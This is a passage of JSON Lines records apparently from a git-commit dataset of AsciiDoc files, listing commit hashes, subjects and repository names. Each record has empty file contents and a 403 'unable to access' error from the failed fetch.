403\n","license":"mit","lang":"AsciiDoc"} {"commit":"abe5192e11a2bd9488f75fcc23966ce89834a082","subject":"Update 2016-11-23-what-buy-accepting-bitcoin.adoc","message":"Update 2016-11-23-what-buy-accepting-bitcoin.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-23-what-buy-accepting-bitcoin.adoc","new_file":"_posts\/2016-11-23-what-buy-accepting-bitcoin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0457c307a6f96e14559bb7952b516470dd3b28d","subject":"Update 2016-12-14-Tuesday-December-14th-2016.adoc","message":"Update 2016-12-14-Tuesday-December-14th-2016.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2016-12-14-Tuesday-December-14th-2016.adoc","new_file":"_posts\/2016-12-14-Tuesday-December-14th-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e559ed02c8d88fb2fefd8119ae6a3f1b0f0433af","subject":"doc\/minor","message":"doc\/minor\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"doc\/release_notes.asciidoc","new_file":"doc\/release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c198b9b0e66a2e8912f2bfb7801113ccb90c3f42","subject":"Update 2016-04-16-Esto-es-un-test.adoc","message":"Update 2016-04-16-Esto-es-un-test.adoc","repos":"Lukas238\/the-holodeck,Lukas238\/the-holodeck,Lukas238\/the-holodeck,Lukas238\/the-holodeck","old_file":"_posts\/2016-04-16-Esto-es-un-test.adoc","new_file":"_posts\/2016-04-16-Esto-es-un-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lukas238\/the-holodeck.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00f82c831e43365ad8850aa90259553c8c16ba47","subject":"Create aws-cf.adoc","message":"Create aws-cf.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/aws-cf.adoc","new_file":"userguide\/tutorials\/aws-cf.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eef992dab838593a305064f599eb8680a25d5d23","subject":"Add how to increase timeout","message":"Add how to increase timeout\n","repos":"markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack","old_file":"README_bugs.adoc","new_file":"README_bugs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7059fd164caba9c9a2da23008fcd6f0b2162997e","subject":"Update 2018-12-05-vr-programing.adoc","message":"Update 2018-12-05-vr-programing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-05-vr-programing.adoc","new_file":"_posts\/2018-12-05-vr-programing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f71bbe324e92af8221ab582efac5370004e892b","subject":"Update 2012-12-05-1336-Menggunakan-WinRAR-di-VPS.adoc","message":"Update 2012-12-05-1336-Menggunakan-WinRAR-di-VPS.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2012-12-05-1336-Menggunakan-WinRAR-di-VPS.adoc","new_file":"_posts\/2012-12-05-1336-Menggunakan-WinRAR-di-VPS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b6aec3a06b1b8c94763d6bb348787c3d493c8cd","subject":"KUDU-1277 Remove kudu.split_keys example","message":"KUDU-1277 Remove kudu.split_keys example\n\nChange-Id: Ibb8930b4a434c490b570279f74ed1381ab41a445\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1652\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\nTested-by: Todd Lipcon 
<2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\n","repos":"cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu","old_file":"docs\/kudu_impala_integration.adoc","new_file":"docs\/kudu_impala_integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f388eb9dcd82a2da78e2636656cfd46d36903ecf","subject":"Add MANDATORY MATCH","message":"Add MANDATORY MATCH\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/CIP2016-01-26-mandatory-match.adoc","new_file":"cip\/CIP2016-01-26-mandatory-match.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"594cab1a0193000f117e3690675527155e3229dd","subject":"Update 2017-06-30-C-S-S-Because-tuyu.adoc","message":"Update 2017-06-30-C-S-S-Because-tuyu.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-30-C-S-S-Because-tuyu.adoc","new_file":"_posts\/2017-06-30-C-S-S-Because-tuyu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eaf460d9fa7f7253441777146c1eed99b7afa4bb","subject":"Shorter SO answer URL","message":"Shorter SO answer URL\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/Exceptions.adoc","new_file":"Best practices\/Exceptions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca1be6296e2514c555399d36618d22191587f930","subject":"Log insuff","message":"Log insuff\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Exceptions.adoc","new_file":"Best practices\/Exceptions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec2116f8937cd15708aad4b825c04dcb192056b5","subject":"Update 2008-01-01-Test-Post.adoc","message":"Update 
2008-01-01-Test-Post.adoc","repos":"jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io","old_file":"_posts\/2008-01-01-Test-Post.adoc","new_file":"_posts\/2008-01-01-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"753c29c3c27839a12852b1f3ccc4c9e6f0e9dcd0","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"452c877c432f7394e86cda1ee19468fcac53e733","subject":"Add documentation","message":"Add documentation\n","repos":"qarea\/jirams,qarea\/jirams","old_file":"doc\/narada-base-tracker-adapter.adoc","new_file":"doc\/narada-base-tracker-adapter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qarea\/jirams.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf95248c377cd499f4314551b1b82ea2b40838f9","subject":"Documents defaultZone case sensitivity","message":"Documents defaultZone case sensitivity\n\nFixes gh-3695\n","repos":"ryanjbaxter\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-netflix.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-netflix.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ryanjbaxter\/spring-cloud-netflix.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dbd1b249000f19ba4e6cc4ac88ef37e9a19839e2","subject":"Update 2016-08-09-xiaocase2.adoc","message":"Update 2016-08-09-xiaocase2.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-09-xiaocase2.adoc","new_file":"_posts\/2016-08-09-xiaocase2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"023f14851bcf5bb2a944a2bfd84c22eb7d03c354","subject":"Update 2017-03-25-create-pc.adoc","message":"Update 
2017-03-25-create-pc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-25-create-pc.adoc","new_file":"_posts\/2017-03-25-create-pc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3b17ea6706230d32b953320f94e68f23551e639","subject":"Update 2018-07-07-Python-AI.adoc","message":"Update 2018-07-07-Python-AI.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-07-07-Python-AI.adoc","new_file":"_posts\/2018-07-07-Python-AI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7aa202e467d6528eab7655a04e8a426d6831088","subject":"Rough sketch for clustering design doc","message":"Rough sketch for clustering design doc\n","repos":"GaryWKeim\/ehcache3,ehcache\/ehcache3,albinsuresh\/ehcache3,ljacomet\/ehcache3,aurbroszniowski\/ehcache3,rkavanap\/ehcache3,AbfrmBlr\/ehcache3,rkavanap\/ehcache3,albinsuresh\/ehcache3,lorban\/ehcache3,cljohnso\/ehcache3,ehcache\/ehcache3,jhouserizer\/ehcache3,GaryWKeim\/ehcache3,ljacomet\/ehcache3,chrisdennis\/ehcache3,alexsnaps\/ehcache3,aurbroszniowski\/ehcache3,cschanck\/ehcache3,chrisdennis\/ehcache3,henri-tremblay\/ehcache3,AbfrmBlr\/ehcache3,lorban\/ehcache3,jhouserizer\/ehcache3,cljohnso\/ehcache3,cschanck\/ehcache3","old_file":"module.clustering.asciidoc","new_file":"module.clustering.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jhouserizer\/ehcache3.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"20dd2cc66384b6138da306b966b411cdab38d97a","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"287bdd7ece1b4f01da14131f7ed8a6c5f4f322f8","subject":"Update 2015-01-31-Blog-Title.adoc","message":"Update 2015-01-31-Blog-Title.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2015-01-31-Blog-Title.adoc","new_file":"_posts\/2015-01-31-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b0218c2d7a04575573d3778188670aea810254d","subject":"Update 2016-09-01-Quefazeres.adoc","message":"Update 
2016-09-01-Quefazeres.adoc","repos":"bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io","old_file":"_posts\/2016-09-01-Quefazeres.adoc","new_file":"_posts\/2016-09-01-Quefazeres.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bretonio\/bretonio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"820368578e6421ea7276c6f18dd62e3b1f684e13","subject":"Update 2017-02-05-First-post.adoc","message":"Update 2017-02-05-First-post.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-02-05-First-post.adoc","new_file":"_posts\/2017-02-05-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8a8a86e8b961d847d2e90ef347d4f4b398e52df","subject":"Update 2017-05-31-Java-types.adoc","message":"Update 2017-05-31-Java-types.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-31-Java-types.adoc","new_file":"_posts\/2017-05-31-Java-types.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08e02d11b332c6b552d5f6c9e14a168cc9388b7c","subject":"Fix formatting (#74)","message":"Fix formatting (#74)\n\nA code fence was indented causing the rest of the document to be rendered incorrectly.","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"java\/chapters\/ch02-basic-concepts.adoc","new_file":"java\/chapters\/ch02-basic-concepts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"867d4a52d2a983fa86c8979ae25a345525c50c0a","subject":"Update 2015-02-11-fontend-way.adoc","message":"Update 2015-02-11-fontend-way.adoc","repos":"deepwind\/deepwind.github.io,deepwind\/deepwind.github.io,deepwind\/deepwind.github.io","old_file":"_posts\/2015-02-11-fontend-way.adoc","new_file":"_posts\/2015-02-11-fontend-way.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deepwind\/deepwind.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2bc3ce73475a58a42ddc679d0a33ab242072d530","subject":"Update 2018-01-27-Google-Home.adoc","message":"Update 2018-01-27-Google-Home.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-27-Google-Home.adoc","new_file":"_posts\/2018-01-27-Google-Home.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c162db8f85d14cfd50d645333aabdd2cf5451c70","subject":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","message":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"865434b3667ee93e5e180906852b1735d9afb067","subject":"Fixed tests and added headers.","message":"Fixed tests and added headers.\n","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/ipython_post_setup.adoc","new_file":"docs\/ipython_post_setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0dba6175f60c2cfccc1596b318ffeaddfb40f962","subject":"CAMEL-12815 - Added iota-component generated doc to docs folder","message":"CAMEL-12815 - Added iota-component generated doc to docs folder\n","repos":"christophd\/camel,tdiesler\/camel,nikhilvibhav\/camel,christophd\/camel,ullgren\/camel,pax95\/camel,davidkarlsen\/camel,cunningt\/camel,pmoerenhout\/camel,tadayosi\/camel,nicolaferraro\/camel,tadayosi\/camel,adessaigne\/camel,pax95\/camel,tdiesler\/camel,zregvart\/camel,cunningt\/camel,adessaigne\/camel,pmoerenhout\/camel,nicolaferraro\/camel,punkhorn\/camel-upstream,pax95\/camel,Fabryprog\/camel,apache\/camel,DariusX\/camel,alvinkwekel\/camel,mcollovati\/camel,tadayosi\/camel,christophd\/camel,Fabryprog\/camel,gnodet\/camel,nicolaferraro\/camel,objectiser\/camel,tdiesler\/camel,objectiser\/camel,kevinearls\/camel,zregvart\/camel,tadayosi\/camel,kevinearls\/camel,pax95\/camel,adessaigne\/camel,tadayosi\/camel,kevinearls\/camel,zregvart\/camel,nikhilvibhav\/camel,punkhorn\/camel-upstream,CodeSmell\/camel,christophd\/camel,apache\/camel,gnodet\/camel,pmoerenhout\/camel,ullgren\/camel,nikhilvibhav\/camel,mcollovati\/camel,nikhilvibhav\/camel,objectiser\/camel,kevinearls\/camel,christophd\/camel,ullgren\/camel,Fabryprog\/camel,cunningt\/camel,CodeSmell\/camel,davidkarlsen\/camel,tdiesler\/camel,adessaigne\/camel,gnodet\/camel,tdiesler\/camel,Fabryprog\/camel,apache\/camel,adessaigne\/camel,apache\/camel,DariusX\/camel,cunningt\/camel,pmoerenhout\/camel,pmoerenhout\/camel,kevinearls\/camel,objectiser\/camel,ullgren\/camel,CodeSmell\/camel,CodeSmell\/camel,cunningt\/camel,alvinkwekel\/camel,tdiesler\/camel,davidkarlsen\/camel,DariusX\/camel,gnodet\/camel,gnodet\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,pax95\/camel,nicolaferraro\/camel,kevinearls\/camel,alvinkwekel\/camel,adessaigne\/camel,DariusX\/camel,tadayosi\/camel,punkhorn\/camel-upstream,mcollovati\/camel,zregvart\/camel,apache\/camel,pax95\/camel,mcollovati\/camel,christophd\/camel,apache\/camel,alvinkwekel\/camel,cunningt\/camel,pmoerenhout\/camel","old_file":"docs\/components\/modules\/ROOT\/pages\/iota-component.adoc","new_file":"docs\/components\/modules\/ROOT\/pages\/iota-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a3cf0bff871411511956a6441552ccb4187cd8f8","subject":"Update 2015-07-02-Ruby-Rack.adoc","message":"Update 2015-07-02-Ruby-Rack.adoc","repos":"cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io","old_file":"_posts\/2015-07-02-Ruby-Rack.adoc","new_file":"_posts\/2015-07-02-Ruby-Rack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cncgl\/cncgl.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"057510ee2ac678ca0a88a3943aa2e176cd0336c1","subject":"Update 2016-02-12-The-start.adoc","message":"Update 2016-02-12-The-start.adoc","repos":"jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io","old_file":"_posts\/2016-02-12-The-start.adoc","new_file":"_posts\/2016-02-12-The-start.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jblemee\/jblemee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86a32de25e82045cc045c890c66b62e8c2a2fec5","subject":"add content for rates including resets","message":"add content for rates including resets\n","repos":"jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsanda\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2b88946362a67ceaf06a4796287d71a868d27efb","subject":"Uses the AWS Code of Conduct, resolves #482","message":"Uses the AWS Code of Conduct, resolves #482\n","repos":"arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dalbhanj\/kubernetes-aws-workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e5c7c00ee4be0c7d1cf238745e5926385527c2e2","subject":"code of conduct","message":"code of conduct\n","repos":"spring-cloud-stream-app-starters\/http","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud-stream-app-starters\/http.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b967d42f8593638748190e778d07a8e618e097f6","subject":"Update versions in doc.","message":"Update versions in doc.\n","repos":"funcool\/cats,tcsavage\/cats","old_file":"doc\/content.adoc","new_file":"doc\/content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tcsavage\/cats.git\/': The requested URL returned error: 
403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"44220fd2202ec65dc4177225fc020e5bc6aea3a7","subject":"Log in","message":"Log in\n","repos":"EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST","old_file":"lab\/lab.adoc","new_file":"lab\/lab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMCWorld\/2015-REST.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8bcbebbf0dc6c2cbedc00a86fa202d6c3cad4d19","subject":"[DOCS] Mention option to return String in sort context (#76105)","message":"[DOCS] Mention option to return String in sort context (#76105)\n\n* Painless: Mention option to return String in sort context\r\n\r\n* Adjust wording","repos":"GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"docs\/painless\/painless-contexts\/painless-sort-context.asciidoc","new_file":"docs\/painless\/painless-contexts\/painless-sort-context.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GlenRSmith\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ce355a954ca17900c30160c5214fff4a16d9ee2a","subject":"Adding webinar recording to the blog","message":"Adding webinar recording to the blog\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-02-13-debezium-webinar-at-devnation-live.adoc","new_file":"blog\/2019-02-13-debezium-webinar-at-devnation-live.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"863975558afaabc4ddfcafcd07db48bf6a8ff35e","subject":"Update 2016-04-28-First-post.adoc","message":"Update 2016-04-28-First-post.adoc","repos":"grzrobak\/grzrobak.github.io,grzrobak\/grzrobak.github.io,grzrobak\/grzrobak.github.io,grzrobak\/grzrobak.github.io","old_file":"_posts\/2016-04-28-First-post.adoc","new_file":"_posts\/2016-04-28-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grzrobak\/grzrobak.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa4f2093eaa981ea27d1bd1a522513ada070d885","subject":"Updt deps","message":"Updt deps\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"WS client\/JAX-RS client.adoc","new_file":"WS client\/JAX-RS client.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 